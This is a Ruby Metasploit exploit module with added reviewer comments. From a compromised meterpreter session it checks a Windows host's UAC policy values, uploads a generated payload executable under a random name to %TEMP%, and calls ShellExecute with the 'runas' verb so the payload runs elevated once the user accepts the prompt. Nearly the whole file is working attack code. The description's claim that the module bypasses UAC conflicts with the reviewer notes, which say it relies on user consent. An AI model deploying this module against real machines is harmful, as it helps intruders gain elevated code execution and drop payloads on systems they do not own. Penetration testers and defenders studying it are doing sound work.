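##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# Local module that asks Windows to start an executable elevated by calling
# ShellExecute with the "runas" verb from an existing meterpreter session.
#
# Reviewer notes:
# * Nothing in this file defeats UAC. The elevation request goes through the
#   normal consent path, and the status messages below tell the operator to
#   wait for the user to click 'Ok'. The referenced write-up is titled
#   "UAC user assisted compromise".
# * Observable behaviour on the host, as far as this file shows: two value
#   reads under HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System,
#   an .exe written to PATH (default: expanded %TEMP%), and one ShellExecuteA
#   call with the "runas" verb on that file. The default file name is 6-13
#   random alphabetic characters plus ".exe".
# * The written file is not removed anywhere in this module, so it stays on
#   disk as an artefact.
class Metasploit3 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Post::Common
  include Exploit::EXE
  include Post::File

  # Registers module metadata and the three datastore options
  # (FILENAME, PATH, UPLOAD).
  #
  # @param info [Hash] metadata merged with this module's defaults
  def initialize(info={})
    super( update_info( info,
      'Name'          => 'Windows Escalate UAC Execute RunAs',
      'Description'   => %q{ This module will attempt to elevate execution level using the ShellExecute undocumented RunAs flag to bypass low UAC settings. },
      'License'       => MSF_LICENSE,
      'Author'        => [
        'mubix <mubix[at]hak5.org>' # Port to local exploit
      ],
      'Version'       => '$Revision$',
      'Platform'      => [ 'windows' ],
      'SessionTypes'  => [ 'meterpreter' ],
      'Targets'       => [ [ 'Windows', {} ] ],
      'DefaultTarget' => 0,
      'References'    => [
        [ 'URL', 'http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html' ]
      ],
      'DisclosureDate'=> "Jan 3, 2012"
    ))

    register_options([
      OptString.new("FILENAME", [ false, "File name on disk"]),
      OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]),
      OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ])
    ])
  end

  # Reports the host's UAC policy values, optionally writes the generated
  # executable to disk, then requests elevated execution of that path.
  #
  # The registry key handle and the remote file handle are both released in
  # +ensure+ blocks, so a failed query or a failed write no longer leaves
  # them open in the session.
  def exploit
    root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System")
    open_key = session.sys.registry.open_key(root_key, base_key)

    begin
      lua_setting = open_key.query_value('EnableLUA')
      if lua_setting.data == 1
        print_status "UAC is Enabled, checking level..."
      else
        # NOTE(review): this branch only reports; execution continues and the
        # consent level is still queried and reported below.
        print_good "UAC is not enabled, no prompt for the user"
      end

      uac_level = open_key.query_value('ConsentPromptBehaviorAdmin')
    ensure
      # Release the remote registry handle even when a query raises.
      open_key.close
    end

    # ConsentPromptBehaviorAdmin: 2 and 5 both lead to a prompt for the user;
    # 0 is the elevate-without-prompting setting. Any other value is not
    # reported.
    case uac_level.data
    when 2
      print_status "UAC is set to 'Always Notify'"
      print_status "The user will be prompted, wait for them to click 'Ok'"
    when 5
      # NOTE(review): print_debug here vs print_status for value 2 looks
      # unintentional; left as in the original, confirm the intended level.
      print_debug "UAC is set to Default"
      print_debug "The user will be prompted, wait for them to click 'Ok'"
    when 0
      print_good "UAC is not enabled, no prompt for the user"
    end

    #
    # Generate payload and random names for upload
    #
    payload_exe = generate_payload_exe

    payload_filename = datastore["FILENAME"] ||
                       (Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe")
    payload_path = datastore["PATH"] || session.fs.file.expand_path("%TEMP%")
    cmd_location = "#{payload_path}\\#{payload_filename}"

    if datastore["UPLOAD"]
      print_status("Uploading #{payload_filename} - #{payload_exe.length} bytes to the filesystem...")
      fd = session.fs.file.new(cmd_location, "wb")
      begin
        fd.write(payload_exe)
      ensure
        # Close the remote file handle even if the write fails part-way.
        fd.close
      end
    end

    # "runas" is the ShellExecute verb that requests elevation; 5 is SW_SHOW.
    # The return value is not inspected, so a declined prompt is not reported.
    session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5)
  end
end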